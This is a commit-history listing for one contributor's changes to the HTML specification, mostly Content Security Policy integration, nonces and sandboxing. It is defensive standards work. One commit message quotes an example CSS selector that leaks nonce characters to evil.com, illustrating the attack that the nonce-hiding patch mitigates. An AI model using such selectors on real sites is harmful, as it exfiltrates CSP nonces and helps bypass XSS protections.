Permalink
Commits on Nov 22, 2017
  1. Hide nonce content attribute values

    mikewest authored and annevk committed Nov 22, 2017
    Some [recent attacks on CSP][1] rely on the ability to exfiltrate
    nonce data via various mechanisms that can read content attributes.
    CSS selectors are the best example: through clever use of
    prefix/postfix text matching selectors values can be sent out to an
    attacker's server for reuse (e.g.,
    `script[nonce=a] { background: url("https://evil.com/nonce?a");}`).
    
    This patch mitigates the risk of this class of attack by hiding the
    nonce value from elements' content attributes by moving the `nonce`
    attributes into a new `NoncedElement` interface mixin, which is
    included into `HTMLElement`. That mixin defines the following
    behaviors for the `nonce` content attribute:
    
    1.  When the `nonce` content attribute is set or changed, its new
        value is copied into a `[[CryptographicNonce]]` slot on the
        element.
    
    2.  When a `NoncedElement` is inserted into a document which was
        delivered with a `Content-Security-Policy` header, the `nonce`
        content attribute is cleared out.
    
    The `nonce` IDL attribute getter and setter now operate on the
    `[[CryptographicNonce]]` slot's value rather than reflecting the
    content attribute, meaning that the nonce value remains exposed
    to script, but is opaque to non-script side-channels.
    
    Likewise, the `[[CryptographicNonce]]` slot's value is used when
    populating a request's cryptographic nonce metadata in order to
    deliver the nonce to CSP for validation.
    
    Tests: https://github.com/w3c/web-platform-tests/tree/master/content-security-policy/nonce-hiding
    
    Closes #2369.
    
    [1]: https://www.blackhat.com/docs/us-17/thursday/us-17-Lekies-Dont-Trust-The-DOM-Bypassing-XSS-Mitigations-Via-Script-Gadgets.pdf
Commits on Nov 20, 2017
  1. Editorial: Clarifying secure context integration with Shared Workers

    mikewest authored and domenic committed Nov 20, 2017
    This caused some confusion in a bug report. I think we could have avoided that
    if we'd used a name other than isSecureContext for the variable, as it's
    easily confused with an operation.
Commits on Jul 13, 2017
Commits on Nov 14, 2016
  1. Apply CSP to javascript URLs in navigate

    mikewest authored and annevk committed Nov 14, 2016
    w3c/webappsec-csp#142 refactors CSP to handle navigation to javascript URLs as inline script. This patch adjusts HTML to call into that refactored algorithm.
    
    Fixes #1901.
Commits on Nov 3, 2016
Commits on Sep 28, 2016
  1. Add <link nonce>

    mikewest authored and annevk committed Sep 28, 2016
    This patch adds the nonce attribute to <link> elements in order to support CSP
    checks on stylesheet requests. The implementation follows along with the similar
    attributes for <style> and <script>.
    
    Fixes #1814.
Commits on Sep 13, 2016
  1. Treat 'data:' documents as unique, opaque origins (#1756)

    mikewest authored and foolip committed Sep 13, 2016
    This patch changes the handling of 'data:' URLs to which user agents
    navigate. Rather than inheriting the origin of the settings object
    responsible for the navigation, they will be treated as unique,
    opaque origins.
    
    This aligns the spec with the behavior found in Chrome, Safari,
    Opera, and Edge.
    
    Closes #1753.
Commits on Sep 12, 2016
  1. Set "one permitted sandbox navigator" for all sandbox-created popups

    mikewest authored and domenic committed Sep 12, 2016
    This patch ensures that any browsing context created from a sandboxed
    document will have its "one permitted sandbox navigator" set.
    Previously, this property was not set when navigating from a sandboxed
    document whose "sandbox propagates to auxiliary browsing contexts flag"
    was not set (e.g. those loaded with 'allow-popups-to-escape-sandbox'),
    which meant that sandboxed documents could navigate unrelated windows.
    Closing this hole in the spec aligns with the behavior Firefox plans
    to ship, and Chrome intends to align with this behavior as well.
    
    Fixes #1218.
Commits on Aug 19, 2016
  1. Editorial: moar bikeshed metadata

    mikewest authored and annevk committed Aug 19, 2016
    This should cover the few remaining terms that CSP needs, and does some drive-by work for MIX and REFERRER-POLICY as well.
Commits on Aug 18, 2016
  1. Upstream navigation hooks from CSP

    mikewest authored and annevk committed Aug 18, 2016
    This will enable implementation of 'frame-ancestors' and 'form-action', and makes a bit of progress towards #1230.
  2. Editorial: add bikeshed metadata

    mikewest authored and annevk committed Aug 18, 2016
    This patch adds bikeshed metadata for various concepts and terms used by CSP and related specifications.
Commits on Aug 2, 2016
  1. Upstream the 'plugin-types' hooks from CSP3

    mikewest authored and domenic committed Aug 2, 2016
    When processing <applet>, <embed>, and <object>, call into the CSP3
    hooks to ensure that 'plugin-types' is consulted before fetching
    a plugin resource.
Commits on Jul 15, 2016
  1. Add 'creator context security'

    mikewest authored and domenic committed Jul 15, 2016
    Secure Contexts relied on 'creator Document', which was removed in
    #987. This patch caches the security status of that
    Document for the new browsing context's security checks.
    
    w3c/webappsec-secure-contexts#37
  2. Upstream SharedWorker constructor changes from Secure Contexts

    mikewest authored and domenic committed Jul 15, 2016
    Monkey-patches bad. Upstreaming good. Closes w3c/webappsec-secure-contexts#31.
Commits on May 23, 2016
  1. Updating references from CSPDOCUMENT to CSP

    mikewest authored and annevk committed May 23, 2016
    w3c/webappsec-csp@0cd4bf4 folded the one into the other after some discussion at the recent face-to-face. This patch updates HTML accordingly.
    
    Fixes #1157.
Commits on Apr 15, 2016
  1. Wire up CSP's control over the base element

    mikewest authored and annevk committed Apr 15, 2016
    Upstreaming CSP's control over the base element per https://bugzilla.mozilla.org/show_bug.cgi?id=1263286.
  2. Pass parser metadata to Fetch

    mikewest authored and annevk committed Apr 15, 2016
    In order for CSP to correctly implement the 'unsafe-dynamic' source expression, HTML needs to teach Fetch about the parser-insertedness that ought to be associated with script requests.
    
    See w3c/webappsec-csp#70 for context.
    
    The Fetch side of this patch is whatwg/fetch#285.
Commits on Apr 14, 2016
  1. Add a source argument to CSP's inline behavior algorithm

    mikewest authored and annevk committed Apr 14, 2016
    To support hash-based whitelisting of inline event handlers, CSP has added a _source_ argument to the "Should _element_'s inline behavior be blocked by Content Security Policy?" (in w3c/webappsec#13). This
    patch adds the same argument to the four callsites in HTML.
Commits on Apr 8, 2016
  1. Wire up HostEnsureCanCompileStrings to CSP

    mikewest authored and domenic committed Apr 6, 2016
    CSP defines an algorithm we can use to define
    HostEnsureCanCompileStrings, which throws an EvalError if string
    compilation is disallowed.
    
    We define HostEnsureCanCompileStrings here, delegating to CSP's
    EnsureCSPDoesNotBlockStringCompilation, because in the future other
    specs might also want to limit eval and setTimeout. It also centralizes
    all the HostWhatever abstract operations in one place, which is nice.
    
    Fixes #271.
Commits on Apr 6, 2016
  1. Pass cryptographic nonce metadata to Fetch

    mikewest authored and annevk committed Apr 6, 2016
    In order for CSP to correctly block/allow requests, HTML needs to teach
    Fetch about the cryptographic nonce metadata that ought to be associated
    with script requests.
    
    See whatwg/fetch#269 for context.
Commits on Jan 29, 2016
  1. CSP: Fix workers' CSP list initialization.

    mikewest committed Jan 29, 2016
    We should be calling into the relevant algorithm from CSP, rather than
    blindly copying the |response|'s CSP list.
    
    Closes #588.
Commits on Dec 14, 2015
  1. Close #384: add CSP hooks to handle inline events and style

    mikewest authored and annevk committed Dec 4, 2015
    The "Should element's inline behavior be blocked by CSP?" algorithm now
    accepts a "type", and can handle event handlers and style attributes.
    This patch adds the relevant hooks to the handling of those two
    features, and updates the existing hooks for inline `<script>` and
    `<style>` elements themselves.
Commits on Nov 6, 2015
  1. Add a 'noopener' <link rel> keyword and window feature

    mikewest authored and annevk committed Oct 27, 2015
    Based on [Charlie Reis' proposal][1], this patch adds a mechanism
    by which web developers can open a new window without granting that
    window access to the opener browsing context. This is possible today
    via 'rel=noopener target=_blank', but that is both obscure and poorly
    explanatory. This patch adds a 'noopener' keyword to both hyperlinks
    and 'window.open' which clarifies the behavior and makes it available
    without side effects.
    
    [1]: https://wiki.whatwg.org/wiki/Links_to_Unrelated_Browsing_Contexts
  2. Call out to CSP's inline element hooks

    mikewest committed Oct 21, 2015
    Content Security Policy defines a "Should element's inline behavior be
    blocked by Content Security Policy?" algorithm in order to handle things
    like nonces, hashes, and 'unsafe-inline'. This patch adds those hooks to
    the appropriate spots in HTML's 'prepare a script' and 'update a style
    block' algorithms.
    
    #271
Commits on Nov 5, 2015
  1. Move 'HTTPS state' from Window to Document

    mikewest committed Nov 5, 2015
    Based on the discussion in #273, it looks like the right thing
    to do with 'HTTPS state' is to keep Worker state on the Worker object, but
    to move a Document's state from the Window to the Document. This patch does
    just that.
  2. Add and populate global object's "CSP list"

    mikewest committed Oct 21, 2015
    Content Security Policy adds a new property to the global object that
    holds the active policy objects for a context. This patch merges this
    property into HTML, and initialises it whenever creating new Document
    and Worker objects.
    
    #271
Commits on Oct 21, 2015
  1. Update CSP links

    mikewest committed Oct 21, 2015
    The CSP specification has moved. This patch updates links accordingly, and
    takes the opportunity to rename an algorithm and remove a referenced
    directive that no longer exists.
    
    #271
Commits on Sep 24, 2015
  1. Add 'HTTPS state' to settings objects

    mikewest authored and annevk committed Sep 22, 2015
    This patch threads Fetch's Response object's 'HTTPS state' through to the
    settings object in the Document or Worker that the response populates.
    This seems fairly straightforward for Workers, but Documents are a bit
    iffy.
    
    See also https://www.w3.org/Bugs/Public/show_bug.cgi?id=27147 and
    https://www.w3.org/Bugs/Public/show_bug.cgi?id=27190.
Commits on Sep 9, 2015
  1. Close #123: add creation URL to environment settings objects

    mikewest authored and annevk committed Sep 9, 2015
    As discussed in https://www.w3.org/Bugs/Public/show_bug.cgi?id=27146,
    "creation URL" gives Service Workers and Secure Contexts the ability
    to perform security checks based upon the original URL of the document
    or worker with which an environment settings object is associated.
    
    The value is set at creation time, and is therefore not influenced by
    things like `history.pushState()` or `history.replaceState()`.
Commits on Sep 8, 2015
  1. Fix #88: add the 'Content-Security-Policy' pragma directive

    mikewest authored and annevk committed Sep 3, 2015
    Content Security Policy defines a new value for the <meta> element's
    'http-equiv' content attribute[1]. This patch integrates that
    definition into HTML.
    
    [1]: https://w3c.github.io/webappsec/specs/content-security-policy/#delivery-html-meta-element
Commits on Aug 31, 2015
  1. Block modal dialogs by default in sandboxed documents

    mikewest authored and annevk committed Aug 29, 2015
    This patch alters 'window.alert()', 'window.confirm()', 'window.print()',
    'window.prompt()', and the 'beforeunload' event to suppress the modal
    dialogs they would otherwise generate when called or fired from within a
    sandboxed document. A new 'allow-modals' sandboxing token is added in
    order to re-enable this functionality if desired.
    
    Discussed at [1] and [2].
    
    [1]: https://groups.google.com/a/chromium.org/d/msg/blink-dev/wXbgxLu63Fo/YtsqkySmTWcJ
    [2]: https://lists.w3.org/Archives/Public/public-whatwg-archive/2015May/0035.html
    
    Closes [3].
    
    [3]: https://www.w3.org/Bugs/Public/show_bug.cgi?id=28818
  2. Define script@nonce and style@nonce attributes

    mikewest committed Aug 28, 2015
    The definitions here are little more than placeholders. We need to
    improve the description in CSP such that HTML can hook into reasonable
    definitions of the behavior that nonces require when executing the
    "prepare a script" and "update a style block" algorithms. For the
    moment, defining the attributes and pointing out to the CSP spec (and
    to w3c/webappsec#463) is probably Good Enough(tm).
Commits on Aug 30, 2015
  1. Cleanup sandbox token lists

    mikewest authored and annevk committed Aug 29, 2015
    955fbaa added the 'allow-popups-to-escape-sandbox' sandbox token,
    but neglected to update a few lists which ought to have contained it. This
    patch takes care of those.
Commits on Aug 29, 2015
  1. Add an 'allow-popups-to-escape-sandbox' sandboxing token

    mikewest committed Aug 28, 2015
    This patch adds the sandbox-escaping functionality described at [1],
    which will allow a sandboxed docuent to spawn new windows without
    forcing the set of active sandboing flags upon them. This allows, for
    example, a third-party advertisement to be (more) safely sandboxed
    without forcing the same restrictions upon a landing page.
    
    Discussed at [2] and [3].
    
    [1]: https://www.w3.org/Bugs/Public/show_bug.cgi?id=28817
    [2]: https://lists.w3.org/Archives/Public/public-whatwg-archive/2015May/0035.html
    [3]: https://groups.google.com/a/chromium.org/d/msg/blink-dev/wXbgxLu63Fo/YtsqkySmTWcJ